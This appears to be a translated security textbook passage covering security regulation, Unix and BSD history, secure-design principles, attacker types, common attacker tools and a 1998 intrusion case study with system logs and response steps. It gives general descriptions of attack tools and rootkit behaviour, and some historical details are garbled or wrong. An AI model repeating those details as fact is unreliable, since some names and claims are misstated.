The European Union has published a more detailed directive that deals with the rules on protection in the electronic communications industry. Article 4 of this directive specifies that a provider of electronic communications services "must take measures to protect the security of its services and, where necessary, those of the providers of the public communications network (with regard to network security)." Second, providers of public electronic communications must warn subscribers about any kind of security threat and, "where the risk lies outside the power and authority of the service providers, take account of any changes, including the likely costs".

How are these general requirements put into practice? Singapore has a particular approach to this. The Monetary Authority of Singapore (MAS) issued a comprehensive set of electronic security recommendations for financial institutions in its Technology Risk Management Guidelines.
These guidelines sought to promote and improve sound processes for managing technology risk and for applying security practices, but compliance with them was not mandatory for anyone. Instead, as the guidelines state: "The Monetary Authority of Singapore intends to incorporate these approaches into its supervision of financial institutions' technology risk assessment and security measures. Each institution that implements these guidelines will gain particular benefits from MAS, and in this way financial institutions are encouraged to work toward alignment with the guidelines." These guidelines should be regarded as a standard for institutions. The following list sets out some of the "musts" for the security practices of financial institutions:

• Software systems and firewalls must be configured to the highest level of security required, and must keep in step with hardening, updates and other measures recommended by system vendors;
• All default passwords on new systems must be changed immediately after installation, since attackers are widely aware of them;
• Firewalls must be installed between internal and external networks and also between sites that are geographically separate; and
• Antivirus software must be installed and run.

The United States has taken a different approach that relies on processes rather than on technology-based practices. Thus the Financial Services Modernization Act (enacted in 1999; known by the names of its principal sponsors in Congress as the Gramm-Leach-Bliley Act) states that "each financial institution has a continuing obligation to respect the privacy of its customers and must protect the security and confidentiality of its customers' nonpublic personal information." Under this law, those who run financial institutions are required to adopt administrative and technical rules and also to provide physical protection for the security of information. The important point is that these rules do not specify which technical components are needed for protection; in this respect the law has left the decision on specific security measures to the organization.

Under this law, the guidelines approved by the regulatory agencies for the financial services industry are implemented by banks. The law does not prescribe the appropriate technical measures, but says that the security program must do the following:

• Identify the foreseeable internal and external threats that could lead to unlawful disclosure, misuse, alteration or destruction of customer information or of customer information systems.
• Assess the likelihood and potential of these threats materializing, taking into account the sensitivity of customer information.
• Assess the adequacy of the policies, processes, customer information systems and other measures for controlling risk.

Information security programs are designed to control risks and are proportionate to the sensitivity, complexity and scope of the information. Implementing the rules requires a broad range of security measures, which must be applied correctly. These measures are:

• Control of access to customer information systems (authentication and access permissions);
• Restriction of access to physical locations;
• Encryption of electronic customer information;
• Change management procedures;
• Use of dual control procedures (a policy of segregation of duties and background checks) for employees who have access to customer information;
• Intrusion monitoring systems;
• Intrusion response programs; and
• Measures to protect against destruction, tampering with, or deletion of customer information.

In addition, under these rules staff must be trained to implement the security programs. These controls, systems and procedures must be reviewed regularly in light of changes in technology, the sensitivity of customer information, internal and external threats to information, and changes in the organization's business arrangements, such as a merger or alliance with another organization, or the outsourcing of work to individuals or companies outside the organization. These rules require the board of directors of a financial institution to approve the organization's written security program and to oversee the design, implementation and maintenance of the program (including responsibility for carrying it out and review of management reports).

Similar rules from the Federal Trade Commission require the financial institutions under its jurisdiction to prepare a plan under which the institutions must:

• Designate one or more employees to be responsible for security;
• Identify and assess, in every area of the company's operations, the risks that threaten customer information, and evaluate the effectiveness of the current system for controlling those risks;
• Design and implement a safeguards program and regularly test and adjust it;
• Select appropriate service providers and contract with them to implement security systems; and
• Evaluate and adjust the program in light of actual circumstances (such as changes in the organization's structure or operations) and, in light of the results of testing, evaluate and adjust the monitoring process as well.

A similar approach can be seen in the United States Health Insurance Portability and Accountability Act, which requires health care institutions to implement security measures to ensure that patient information stored electronically always remains confidential and out of reach of unlawful access. Under this law, institutions are required to maintain appropriate and acceptable administrative, physical and technical safeguards, so that the integrity and confidentiality of individuals' medical records are preserved against foreseeable security threats and unauthorized access. The law applies to the storage and transmission of data and has 28 standards and 41 implementation specifications.
This law states that security processes and procedures must take into account the technical capabilities of record systems, the cost of security measures, the training needs of staff, and the value of reviewing audit trails in computing environments. The security rules identify safeguards that are "required" and those that are "addressable". The main points of the security rules that institutions must observe are:

• Ensure the confidentiality, integrity and availability of the information that the institution creates, receives, maintains or transmits;
• Protect the system against threats that endanger the security or integrity of the information;
• Prevent any use or disclosure of information that cannot be justified under the security rule; and
• Ensure that the workforce complies with the security rules.

The law is nevertheless flexible:

• Covered institutions may use security measures that allow them to implement these standards reasonably and appropriately;
• In deciding which security measures to use, the following must be taken into account:
o its size, complexity and scope;
o the technical infrastructure, hardware, and software security capabilities;
o the cost of the security measures; and
o the likelihood and sensitivity of each of the risks.

Another approach requires companies to disclose weaknesses and defects publicly, in order to improve system performance and raise the level of security. European Union rules require telecommunications service providers to inform subscribers of the risks that threaten them as a result of a security breach in the network (and also of the likely cost). As an example, in July 2003 a law was passed in the state of California under which any company that holds personal information about California residents is obliged to inform them of the possible risks arising from a security breach and subsequent unlawful access to that information.
Part Five: IT Security and Technical Administrators

Chapter 1. Introduction
Chapter 2. Security for Administrators
Chapter 3. Physical Security
Chapter 4. Information Security
Chapter 5. Identification and Authentication
Chapter 6. Server Security
Chapter 7. Network Security
Chapter 8. Types of Attacks and How to Counter Them
Chapter 9. Intrusion Detection and Management
Chapter 10. Special Notes on Different Platforms

Chapter One: Introduction

Summary of Parts 1 to 4

Now that we have reached the most technical part of the book, a review of what was discussed in Parts 1 to 4 will be useful. Recall that:

Part 1 of the book gave a brief introduction to the general issues of security in the digital age. It described the range of IT security issues and some of the hostile acts that occur in computer and network environments, and made clear why security policies and security knowledge are essential for individuals, businesses and other users.

Part 2 addressed the general concerns of individual users and of computer and network resources. It covered the key issues of individual security and offered technical guidelines that, if applied correctly, minimize the threat of a security intrusion.

Part 3 covered the administrative and policy aspects of security from an organizational point of view. There we said that, with the opportunities the new digital media offer, small and medium-sized enterprises (SMEs) in developing countries are moving toward the point where they can influence the development of today's world markets. Appropriate policies and effective implementation of security processes will minimize the risk of accidental and deliberate loss of information, and provide the means to detect attacks and repair security flaws. Security policies for SMEs also need to include elements such as policies for authenticating users in interactive environments such as e-commerce, electronic transactions and e-government. This part offered suggestions on how robust security rules can be established and extended in organizational environments.

Part 4 emphasizes security issues and legislative initiatives, and states that these issues must be understood and acted on at the level of government. In addition to securing its own information assets, government is responsible for making policy to secure and protect the national information infrastructure. Governments must also anticipate what effect the growth of the information infrastructure will have on their legal systems. This part identifies some of the key questions facing policymakers and leaders in the developing world and presents examples of policies from the international community that can serve as a guide for those engaged in new legislative efforts for cyberspace.

Summary of Part Five, with Notes on Technical Background

Part 5 was prepared to help system and network administrators carry out their duties effectively. It gives detailed information on the security issues that need to be understood and followed up at a high technical level, including:

• Classification of security threats, including the attack methods used to break into systems and programs.
• Monitoring the traffic of sensitive systems and of the network so that activity undertaken as part of an attack can be identified and, where possible, repelled.
• Evaluating the results of security assessments while policies and processes are being produced, and analyzing the results of logs and other current records after those security measures have been implemented.
• Countering an attack, recovering from an intrusion, and learning from past experience.

Part 5 differs from the other four parts of this book in that it assumes the reader has a certain level of technical knowledge. Although the concepts are explained clearly and examples are given wherever possible, this part is designed for people who have sufficient experience of working with systems and administering them (or at least have a strong interest in doing so). Interested readers are advised to use the book's appendices, which point to many valuable references on maintaining computers and networks.
Because security issues usually relate to a computer's operating environment, Part 5 includes sections that discuss the known security issues of the major operating systems in use today. Although most of Part 5 is, as far as possible, independent of particular systems, references are occasionally made to the Unix, Microsoft Windows, Mac OS X and Linux operating systems and to other desktop Unix variants. In every case there are clear recommendations on the measures that can and must be taken to prevent system resources from being taken over.

Unix

There is a variety of Unix and Unix-like operating systems (some of them quite different from one another), and they are distributed by different vendors. The reason for this, and its effects, calls for a brief historical review.

The roots of Unix go back to the Multics project of the mid-1960s. This project, funded by the Advanced Research Projects Agency of the United States Department of Defense (DARPA or ARPA), was designed to be an integrated system made up of banks of high-speed processors, memory and communications equipment. By design, part of the computer could be shut down for maintenance without affecting other parts or users. Although this capability is easily achieved today, no such capability existed when Multics began operating. Multics was designed both to be resistant to external attacks and to protect the system's internal users from one another. Multics was designed to support the concept of multilevel security. Multics eventually provided a level of security and service that many computer systems still have not reached.

Whereas Multics tried to do many things, Unix tried to do one thing well: run programs. "Strong security" was not part of this goal. The system was based on compact programs called tools, each of which performed a single distinct operation. During the 1970s the American Telephone & Telegraph company (AT&T) added tools and features to it. In 1973 Thompson rewrote most of Unix in the C programming language, which Ritchie had recently invented. C was designed to be a simple, portable programming language. Programs written in C could easily be moved from one kind of computer to another, as was possible with high-level programming languages such as Fortran. Yet these programs ran at almost the speed of programs coded directly in the machine's native language. By 1977 more than 500 organizations were using the operating system; 125 of them were universities in the United States and in more than 10 foreign countries.

Development continued in various places, including the University of California at Berkeley, which released the Berkeley Software Distribution (BSD), a collection of programs and modifications to the Unix system. Over the next 6 years, in an effort funded by ARPA, what was by then called BSD Unix grew into an operating system in its own right and brought significant improvements over the AT&T operating system. Perhaps the most important of the Berkeley improvements was in networking, which made it easy to connect Unix computers to local area networks (LANs). For all these reasons, the Berkeley version of Unix became very popular in the research and academic communities.
In the late 1980s, as Unix moved from technical uses into commercial markets, the incompatibilities between versions of the AT&T Unix operating system and operating systems based on BSD Unix began to cause problems for all vendors. Commercial customers wanted a standard version of Unix, hoping that they could reduce training costs and guarantee the portability of software between computers made by different vendors. The emerging market for Unix application software also wanted a standard, because vendors believed that it would make supporting multiple platforms easier for them and would also compete with the growing market based on personal computers.

In May 1988, seven leading companies in the Unix industry (Apollo Computer, Digital Equipment Corporation, Hewlett Packard (HP), IBM, and three major European computer manufacturers) announced the formation of the Open Software Foundation (OSF). The aim of OSF was to take Unix out of AT&T's control and place it in the hands of a non-profit industry coalition, which would lead by directing the future development of Unix and making it available to the public under a single license. OSF decided to base its Unix on IBM's implementation, then moved to the Mach Unix kernel from Carnegie Mellon University, which was a blend of libraries and utilities from HP, IBM and Digital Equipment Corporation. Although the result of these efforts was not widely adopted or welcomed, OSF went on to further development work.
GNU

Richard Stallman, a programmer on the LISP project at the university's Artificial Intelligence Laboratory, was greatly upset when he saw that the companies founded to put the research to use had adopted rules that prevented the free sharing of software. Stallman realized that if he wanted to share his software with a large group of people, he could not base it on special hardware that was built by only a few manufacturers and ran only LISP. Instead, he decided to found a new software community based on Unix, a powerful operating system that resembled the earlier system and also had a future. He called his project GNU, a recursive acronym for "GNU's Not Unix"! For Stallman, being free was not only a measure of cost but also a measure of freedom. Being free meant that he was at liberty to inspect the source code and make changes to it, and also free to share copies of the program with his friends. He wanted software to be free in the sense of free speech, not in the sense of free alcoholic drinks. By 1985 GNU's first major product, the Emacs text editor, had matured to the point where it could easily be used by people other than Stallman. Stallman then began work on a free C compiler, GNU C. Both of these programs were distributed under Stallman's GNU General Public License (GPL). This license gave developers the right to publish the source code and make their own changes, provided that all future changes to the program were released under the restrictions of that same license. The same year Stallman founded the Free Software Foundation, a non-profit foundation that collected public donations and used them to hire programmers who wrote freely redistributable software.
Unix and Minix

At about the same time that Stallman started the GNU project, Professor Andrew S. Tanenbaum decided to create his own implementation of the Unix operating system for use in teaching and research. Because the whole program was written from scratch, he could freely publish the source code in his textbook and distribute a working operating system without paying royalties to AT&T. This system, Minix, ran on clones of the IBM PC AT personal computer equipped with Intel-based processors. The project produced a stable, well-documented software platform and also an excellent operating systems textbook. However, "efficiency" was not a basic criterion in the design of Minix, and this, together with the copyright issues associated with the textbook, meant that Minix did not turn out to be a good choice for widespread everyday use.

In 1991 a Finnish computer science student named Linus Torvalds decided to create a free version of the Unix operating system that would be better suited to everyday use. Starting from the Minix code, Torvalds reimplemented the kernel and the file system step by step until he had a new system that contained none of Tanenbaum's original code. Torvalds named the resulting system "Linux" and decided to distribute it under Stallman's GPL license. By combining his system with other freely available tools, notably the Free Software Foundation's GNU C compiler and text editor and the X Consortium's window server, Torvalds was able to create a complete, working operating system. Work on Linux continues to this day, carried on by hundreds of contributors.

NetBSD, FreeBSD, OpenBSD

In 1988 the Berkeley Computer Systems Research Group (CSRG) began a project to remove all AT&T code from its operating system. "Networking Release 1", first made available in June 1989, consisted of Berkeley's implementation of TCP/IP and the related utilities. It was distributed on tape for 1000 dollars, and anyone who bought it was allowed to make any change they wished to its code, provided that the original copyright notice was preserved.
Several large programs implemented anonymous FTP, and the Berkeley code quickly became the basis of many TCP/IP implementations throughout the industry. An interim release called 4.3BSD Reno appeared in early 1990, and a second interim release, "Networking Release 2", in June 1991. This release was a complete operating system except for 6 remaining files in the kernel that contained AT&T code and had therefore not been included in the operating system. In the autumn of 1991 Bill Jolitz wrote these files for the Intel processor and produced a working operating system called 360/BSD.

Within a few months a group of volunteers took on the work of maintaining and developing the resulting system, and their effort was named NetBSD. The NetBSD project quickly splintered. Some members believed that the project's primary goal should be broadened so that it could support as many different platforms as possible and continue to carry out operating system research, but another group of developers believed that they should devote their resources, as far as possible, to making programs run better on the Intel/386 platform and to making the system easier to use. The second group split from the first and started the FreeBSD project. A few years later, another splinter group broke away from the NetBSD project. This group believed that security and reliability were not receiving the attention they needed. The group's emphasis was on careful review of the source code to identify potential problems. They restricted the adoption of new code and drivers until these had been thoroughly reviewed for quality. This third group was named OpenBSD.
Businesses Adopt Unix

Because of Microsoft's monopolistic pricing and the security and elegance of Unix operating systems, many businesses became interested in using commercial products based on Linux. A number of network appliance vendors found the stability and security of the OpenBSD platform appealing and used it in their designs. The stability and the support offered by BSDI, whose system was named BSD/OS, were attractive to other commercial users, especially some of the major early web hosting companies. Various universities also chose BSD/OS because of its favorable licensing terms and its support for students and faculty.

Meanwhile, Linux became very popular among people looking for an alternative operating system for their personal computers. Although OpenBSD was a somewhat more secure and more stable operating system, Linux supported a much wider range of hardware, and it was also somewhat easier to install and work with.

All of this interest, combined with the growing problems of Microsoft's monopoly of the operating system market, attracted the attention of IBM and Dell, both of which had announced commercial support for Linux. At around the same time, two companies devoted solely to the Linux operating system, Redhat and VA Linux, had two of the most successful initial public offerings in the history of the United States stock market. Shortly afterwards HP announced that it would support a version of Linux on its systems.
Another key influence came in the second half of the 1990s, when researchers at various national laboratories, at universities and at NASA began working with clustered computers. In a cluster, hundreds of personal computers are obtained, placed in racks and connected to high-speed networks. On these systems, instead of being run very quickly on a single computer, large problems are divided into several manageable pieces and worked on in parallel on the computers standing side by side. Although this method was not applicable to every problem, it often gave better results than using a single supercomputer, and it also cost far less. One of the first working systems of this kind, named Beowulf, was based on Linux. Because this code was shared and was developed on all fronts by the supercomputing community, Linux spread rapidly among other groups around the world that wanted to do similar work.

Today many businesses and research laboratories work with Linux. They use Linux to run web servers and e-mail servers and, to a lesser extent, as a general-purpose desktop platform. Instead of buying supercomputers, businesses build large Linux clusters, which can solve large computing problems through parallel execution. Similarly, FreeBSD, NetBSD and OpenBSD are well suited to these uses and are widely used. However, anecdotal evidence suggests that Linux has seen greater growth in users than any other system. Judging by the commercial support that has been announced, including the ventures announced by Sun Microsystems, Linux appears to have the better balance of growth in the market. Nevertheless, at least because of issues of security and performance, we do not expect the other BSD variants to fade away; for although the BSD groups continue their separate existence, they do not appear to be gaining any of Linux's market share.
There are several versions of the Linux and BSD operating systems that boot a system from a single floppy disk. These versions, which include Trinix, picoBSD and closedBSD, are designed for applications that demand high security, including forensics, recovery and network appliances.

Security and Unix

Like systems based on Microsoft Windows NT, Unix is a multiuser and multitasking operating system. Multiuser means that the operating system lets different people use the computer at the same time. Multitasking means that each user can run several programs simultaneously. One of the natural functions of such an operating system is to prevent different people (or programs) who are using the same system at the same time from interfering with one another. Without such protection, a wayward program could affect other programs or users, could accidentally delete files, or could bring down the entire computer system. To prevent such disasters, some form of computer security has always had a place in the Unix design philosophy.

Unix security offers more than mere memory protection. Unix has a sophisticated security system that controls the ways users access files, modify system databases and use system resources. Unfortunately, these mechanisms do not help much when the system is misconfigured, is used carelessly, or contains buggy software. Nearly all of the security holes found in Unix over the years have stemmed from problems of this kind rather than from shortcomings in the system's inherent design. Thus nearly all Unix vendors believe that they can deliver a reasonably secure operating system. We believe that Unix systems can be much more secure than other operating systems, but there are nonetheless factors that work against better security in this environment.
Expectations and Hopes

Many users have grown up seeing Unix in a particular configuration. Their experience of Unix in academic, hobbyist and research settings has always been that they had access to all directories and most commands on the system. Users may be used to having their files world-readable by default. Users are also often accustomed to being able to build and install whatever software they want, which usually requires system-level access (the highest level of access).

Unfortunately, all of these expectations run counter to good security practice. To have stronger security, system managers and administrators must at times restrict access to files and commands that users do not really need to do their jobs. Thus someone who needs email and a word processor for their work should not expect to be able to run network analyzers and the C compiler. Likewise, to increase security, users should not be able to install software that has not been tested and approved by a trained and authorized individual.
Administrators can raise the level of security by applying some general security principles in moderation. For example, rather than removing all compilers and libraries from every machine, these tools can be protected so that only users belonging to a particular user group can access them. Users who need such access, and who can be trusted to exercise the necessary care, can be added to this group. Similar methods can be used for other classes of tools, such as network monitoring software or Usenet news programs. In addition, changing the traditional view of "data" on a system (from readable by default to unreadable by default) can be useful. For example, instead of being readable by everyone, users' files and directories should be protected against read access by default. Setting file access controls correctly and using shadow password files are two examples of how this simple change in system configuration can improve security across all of Unix.

The most critical aspect of improving Unix security is getting users to take part in meeting these expectations. Clearly, if users have become accustomed to the personal operating systems that preceded Microsoft Windows NT, this advice applies to improving the security of NT-based systems as well. The way to reach this goal is not by issuing decrees, but through education, awareness and motivation.
Technical security measures are very important, but experience has shown again and again that people problems cannot be solved with technology-based solutions. Many users started using computers in an environment that was less threatening than the one they face today. Educating users about the dangers that exist, and about how much their cooperation can help neutralize those dangers, increases the security of the system. By properly motivating users to take part in good security practice, you make them part of the security mechanism. Better education and motivation work well only when applied together. Education without motivation can mean that security measures are not actually applied, and motivation without education can mean that gaps are left in the measures that are carried out.

Part Five: Information Technology Security and Technical Administrators

Chapter Two
Security for Administrators

Overview

This chapter offers a working definition of security for executive managers, discusses the design of secure systems, and explains who attacks computer systems. It lists some of the attackers' common tools and describes a case study of a sample attack.

Security and Administrators

As a technical administrator, you are responsible for ensuring that the systems you manage work the way they are supposed to. Although there are many formal definitions of security, a useful working definition for administrators is: "A computer is secure if you can depend on it and its software to behave as expected."

If the information you put into your computer today is still there a few weeks from now, and remains unread by those who should not read it, then the computer is secure. Security is thus a critical task in every one of an administrator's roles. By this definition, natural disasters and buggy software are as much a threat to security as unauthorized users.
Poorly Written Software

Designing secure computer systems and software is not easy. In 1975, Jerome Saltzer and M. D. Schroeder defined seven criteria for building such a system. These criteria are:

Least privilege
Every user and process should have the least set of privileges necessary. Least privilege limits the damage that can be done by malicious attackers and by errors alike. Rather than being granted to users by default, privileges should be granted only when they are explicitly required for the users' work.

Economy of mechanism
The design of the system should be small and simple so that it can be verified and correctly implemented.

Complete mediation
Every access should be checked for proper authorization.

Open design
Security should not depend on the ignorance of the attacker. This criterion precludes back doors in the system, which give access to users who know about them.

Separation of privilege
Wherever possible, access to system resources should depend on more than one condition being satisfied.

Least common mechanism
Users should be isolated from one another by the system. This limits both covert monitoring and cooperative efforts to override the system's security mechanisms.

Psychological acceptability
Security controls must be easy to use so that they are actually used and not bypassed.

Unfortunately, designers never learn these criteria; or if they do learn them, they forget them, take shortcuts, or conclude that these matters are not important enough to bother with. As a result, there are many operating systems, algorithms, applications and programs that are poorly designed yet are widely used and claim to be part of the security infrastructure of the system. Poor design leads to unforeseen problems and side effects that may cause accidental damage to systems or information, or may be deliberately exploited by an attacker.
Free Software versus Proprietary Software

One of the more contentious debates in software design is whether development processes that make source code freely available for inspection, modification and redistribution ("free software" or "open source") should be preferred on security grounds over proprietary ("closed source") software.

On the one hand, if source code is freely available, it is easier for attackers to find exploitable flaws in a program by reading the code. Because there are many common classes of programming errors that lead to vulnerabilities, source code can sometimes even be handed to automated analysis programs to uncover problems. Problems in open source software have largely been found and exploited.

On the other hand, closed source software is no cure-all. In many cases software can be "reverse engineered", or vulnerabilities can be identified through black-box testing of the program without the source code being available. Clearly, the unavailability of the source code of, for example, Microsoft's Internet Information Server (IIS) has not prevented attackers from exploiting its various vulnerabilities, and this product appears to have had more reported exploits than, for example, the Apache web server, whose source code is publicly available.
With open source software, the developers and users of a program can find problems and their fixes before attackers do, and publish them ahead of any exploitation. The OpenBSD operating system, which is free software, is widely regarded as one of the most secure operating systems currently available, largely because every line of its kernel source code has also been audited for security by its developers. The kernels of other open source operating systems, Linux among them, are not reviewed this rigorously and contain code from a large number of developers. The degree of security review applied to proprietary Unix operating systems such as Solaris is hard to know.

Knowing the Attacker

Who breaks into the computers on a network with the most sophisticated kinds of attacks? The question hardly matters; that is, it does not matter who the attackers might be, because the system must be protected against all of them.

Script Kiddies

As their name suggests, in many cases the attackers are children and teenagers; people who unfortunately have not yet developed the sense of responsibility and judgment needed to keep their technical skills in check.

Young people who use sophisticated attack tools are called script kiddies. The term is derisive. The word "script" refers to the fact that these attackers, rather than creating attacks of their own, use ready-made attack scripts that can be downloaded from the Internet. They are called "kiddies" because many of them have been under the legal age when arrested.

Script kiddies should be regarded as a serious threat and danger, for the same reason that a teenager with a gun should be feared. In many cases teenagers carrying handguns should be feared even more than adults, because a teenager is less likely to understand the consequences of his actions when he is about to pull the trigger, and is therefore more likely to pull it.
The same holds for script kiddies. For example, in 2001 the website of Gibson Research Corporation was the target of a distributed denial of service (DDoS) attack that knocked it offline for more than 17 hours. The attack was carried out through more than 400 Windows-based computers on the Internet that had been compromised for use in an automated attack. Once the matter came to light, Steve Gibson was able to obtain a copy of the attack program and then reverse engineer and trace it. In the end it turned out that the person who attacked his website was a 13-year-old girl.

In another similar case, when Canadian authorities on April 19, 2000 arrested "Mafiaboy" for his February 2000 attacks on Yahoo, E*TRADE, CNN and many other sites full of personal records, which had caused 1.7 billion dollars in damage, they could not release the suspect's name to the public, because the 16-year-old boy was protected by Canada's law protecting the privacy of minors.

Script kiddies may lack the technical skill to write their own scripts and Trojan horses, but this is hardly a problem for them. They have tools at their disposal and are inclined to use them; either they do not understand the damage they cause, or they do not care.

What does a script kiddie become when he grows up? No one is sure yet; there are no reliable studies. Anecdotal reports say that many script kiddies go straight. Some lose interest in computers, some become system operators or network administrators, and some even go into the computer security field (hiring such individuals to monitor networks is still a matter of controversy in computer security circles), but it goes without saying that some of these individuals continue their life of crime.
Industrial Spies

There appears to be a growing black market for information stolen from computer systems. Some people have tried to blackmail or extort money from the rightful owners of the information, for example by offering to fix a company's vulnerabilities in exchange for huge sums. There have been several documented cases (and probably many unreported ones) in which criminals stole customers' credit card numbers from a company's server and threatened to publish the information unless the company paid them. There are also reports of attackers trying to sell the trade secrets of companies they have penetrated to those companies' competitors. Such transactions have been declared illegal in the United States and in many other countries, though not in all.

Ideologues and Government Agents

In every society there is always a population of "dissidents" who break into sites for intellectual or political reasons. Usually the intent of these people in "defacing web pages" is to publish a statement of some kind. Sometimes the dissidents issue a political statement, sometimes they may express an intellectual position, or they may simply be anarchists stirring up trouble against industry or commerce.

These incidents may sometimes be carried out against national interests. For example, a guerrilla movement might deface sites belonging to a group of government opponents. In other cases, individuals try to achieve a goal in one jurisdiction by attacking sites in another, as in the Israeli-Palestinian conflicts, the dispute between India and Pakistan, and the aftermath of the bombing of the Chinese embassy by United States forces. Many of these attacks may be spontaneous, while some may be planned and funded by the governments themselves.

These incidents can also affect third parties. For example, during one incident in China, many ISPs around the world that hosted web pages of Falun Gong supporters found their servers under attack from sites inside China. Because of the coordination and number of the attacks, authorities believe that they were state-sponsored.
Organized Crime

Enormous amounts of valuable information and financial data are exchanged over the Internet every day. It would be naive to imagine that criminal elements are unaware of this, or are not interested in extending their activities into the networked world. Attacks such as fraud, information theft and money laundering conducted online have occurred that authorities believe are all the work of organized crime. Network communications have been used to expand and coordinate prostitution and vice, gambling, trade in illegal substances, armed assault, and other activities that usually fall under organized crime. In addition, law enforcement agencies may be targeted by criminals seeking to discover what the government knows about them, or to discover the identities of informants and witnesses.

As the network has gone global, the threats have broadened. Today, Russian gangs, the Sicilian Mafia, the Japanese Yakuza, South American drug traffickers and Los Angeles street gangs are all just a few mouse clicks away from us on the global network. Many law enforcement officials worry that the Internet will be a breeding ground for crime in the coming decade.

Rogue Employees

Finally, there are many skilled employees who have acted against their employers out of revenge, malice or spite. In some cases, fired employees have planted Trojan horses in their employers' computers.
What Attackers Want

Merely taking control of a computer system is usually not the end of an intruder's work; rather, attackers often use the systems they have taken over as a first step toward further attacks and sabotage. Once an attacker has taken control of a system, the system can be used for a variety of malicious purposes, including:

• Launching probes or exploits against other systems;
• Enlisting the system in distributed denial of service attacks;
• Running covert servers (for example, the attacker may set up an Internet Relay Chat server that acts as a rendezvous point for Trojan horses and viruses that send back stolen data);
• Covertly monitoring the network of the organization that owns the compromised systems, with the aim of compromising more systems; and
• Turning it into a repository for attack tools, pirated software, pornography, or other kinds of contraband information.

There are many reasons why compromised systems make excellent platforms for these kinds of illegal activity. If a compromised system has a high-speed connection to the Internet, it may be able to cause more damage and disruption than other systems under the attacker's control. Compromised systems can also be used to make it harder for authorities to trace an attacker's actions back to the real attacker. If an attacker hops through many computers in different jurisdictions (for example, from a Unix account in France to a Windows-based proxy server in South Korea, and from a university computer center in Mexico to a backbone router in New York), it may become practically impossible to trace the attacker back to the source.

Tools of the Attacker's Trade

Some of the tools commonly used by attackers are:

nc (a.k.a. netcat)
Originally written by Hobbit, netcat is the Swiss Army knife for IP-based networks. As such, netcat is a valuable administration tool that is also useful to attackers. You can use netcat to send arbitrary data to arbitrary TCP/IP ports on remote computers, to set up local TCP/IP servers, and to perform basic port scans.

Trinoo (a.k.a. Trinoo)
Trinoo is an attack server. The program waits for a message from a remote system and, on receiving the message, launches a denial of service attack against a third party. Versions of Trinoo are available for most Unix operating systems, including Solaris and Red Hat Linux. The presence of Trinoo is usually hidden. A detailed analysis of Trinoo is available at:
http://staff.washington.edu/dittrich/misc/trinoo.analysis

Back Orifice and Netbus
These Windows-based programs are Trojan horses that let attackers monitor keystrokes, access files, upload and download programs, and run software on the compromised systems.

Bots
Bots (short for robots) are small programs that are typically planted by an attacker on a number of computers scattered across the Internet. Bots are one of the primary tools for controlling and directing distributed denial of service attacks over Internet Relay Chat channels. Bots may be distributed by viruses or Trojan horses. These programs may lie dormant for days, weeks or months before being activated. Bots can also be used for automated tasks.
Rootkits
A rootkit is a program or set of programs that simultaneously gives an attacker superuser privileges on a computer, plants back doors on the computer, and erases any trace of the attacker's presence. Rootkits were originally designed for Unix systems (the name is tied to the root user account), but they have been produced for Windows systems as well. A typical rootkit may make many attempts to obtain superuser privileges. Once superuser access has been obtained, the rootkit can modify the login program so that a back door is added to it. It then modifies the kernel so that any attempt to read the login program returns the modified contents rather than the original program; commands may be modified so that network connections from the attacker's computer are not displayed; and finally the rootkit may erase the last five minutes of the computer's log files.

Worms
Worms, which exploit vulnerabilities in network servers or in the networking components of operating systems, have become a common way of compromising large numbers of computers at once.
Case Study: Faxsurvey

On October 7, 1998, an employee at Vineyard.NET noticed that the user http was logged into the company's main web server:

    Script started on Wed Oct 7 20:54:21 1998
    bash-2.02# w
    8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
    USER     TTY  FROM              LOGIN@   IDLE   WHAT
    http     p0   KRLDB110-06.spli  Tue02AM  1days  /bin/sh
    simsong  p1   asy12.vineyard.n  8:42PM   15     -tcsh (tcsh)
    ericx    p2   mac-ewb.vineyard  8:46PM   0      script
    ericx    p3   mac-ewb.vineyard  8:46PM   11     top
    ericx    p4   mac-ewb.vineyard  8:53PM   1      sleep 5
    bash-2.02#

The computer was running the BSDI operating system, version 3.1, with all of the patches and fixes supplied by the vendor. The web server was a version of the Apache server called "Stronghold". The computer was used to initiate automated electronic funds transfers on customers' accounts. To support these transfers, the computer held bank account and credit card information. (Fortunately, this information was stored on the computer in encrypted form.)

In all such cases, a user logged in as http can be the result of one of two things. First, it could be a member of the ISP's staff who was using the http account for debugging; otherwise, it could be an attacker who has found a way to break into the http account but has not managed to gain further access. Because the http user had logged in from a computer whose name began with KRLDB110-06.spli, the employee realized that this was an unauthorized access.

When the intrusion was discovered, one of the staff immediately ran the Unix script program to record the intruder's actions. It appeared that, after that, the intruder had not connected to the network for more than a day. The original break-in had occurred on Tuesday at 2 a.m. The next step was to list all of the processes that were running on the computer at the time. Two processes were out of the ordinary: two copies of the /bin/sh shell being run by http. Both shells had been started the previous day, one at 2 a.m. and the other at 4 a.m.
    bash-2.02# ps auxww
    USER   PID  %CPU %MEM  VSZ   RSS TT STAT STARTED  TIME    COMMAND
    root 11766   3.0  0.0    0     0 ?? Z    23Sep98  0:00.00 (admin-server)
    root  3763   1.0  0.0    0     0 ?? Z    2:03PM   0:00.00 (junkbuster)
    mail 18120   1.3  0.3  816   724 ?? S    8:56PM   0:00.46 smap
    root 17573   1.0  0.0    0     0 ?? Z    11:03AM  0:00.00 (admin-server)
    root    16   0.0  0.0   68    64 ?? Is   10Sep98  0:00.00 asyncd 2
    root    18   0.0  0.0   68    64 ?? Is   10Sep98  0:00.02 asyncd 2
    root    28   0.0  8.0  748 20680 ?? Ss   10Sep98  0:16.32 mfs -o rw -s 40960 /dev/sdob/tmp (mount_mfs)
    root    53   0.0  0.1  268   296 ?? Ss   10Sep98  0:38.23 gettyd -s
    root 18670   0.0  0.5  560  1276 ?? S    Tue02AM  0:04.77 (xterm)
    http 18671   0.0  0.1  244   276 p0 Is   Tue02AM  0:02.23 /bin/sh
    http 26225   0.0  0.1  236   276 p0 I+   Tue04AM  0:00.7  /bin/sh
    …

It appeared that the intruder had succeeded in breaking in and had then, for some reason, abandoned the effort. To deal with this threat, the ISP laid down the following rules:

1. Do not alert the intruder to what is happening.
2. Find the intruder's source IP address.
3. Use the Unix kill command to stop the intruder's processes. This command prevents the processes from running while leaving a copy of them in memory.
4. Using the Unix gcore command, make a second copy of the intruder's processes.
5. Define a rule on the ISP's router to block packets sent from the intruder's ISP.
6. Destroy the intruder's processes completely with the kill -9 command.
7. Determine how the intruder got into the system and fix the hole that was exploited.
8. Notify law enforcement.

